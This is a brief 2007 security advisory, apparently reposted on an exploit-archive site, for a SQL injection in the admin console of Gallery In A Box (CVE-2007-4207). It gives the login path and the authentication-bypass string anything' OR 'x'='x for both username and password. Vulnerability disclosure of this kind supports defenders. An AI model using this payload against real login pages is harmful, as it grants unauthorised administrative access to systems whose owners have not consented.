Gallery In A Box Username & Password Parameters SQL Injection
SecurityAlert : 2977 CVE : CVE-2007-4207 SecurityRisk : Medium (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : Aria-Security Team Published : 08.08.2007
Affected Software :
Gallery In A Box
Advisory Content :
__________________________
A R I A - S E C U R I T Y
_________________________
Gallery In A Box Username & Password Parameters SQL Injection
Vendor: http://www.kerberosdev.net/
http://target.com/admin_console/index.asp
Username: anything' OR 'x'='x
Password: anything' OR 'x'='x
Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info
Greetz: AurA
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.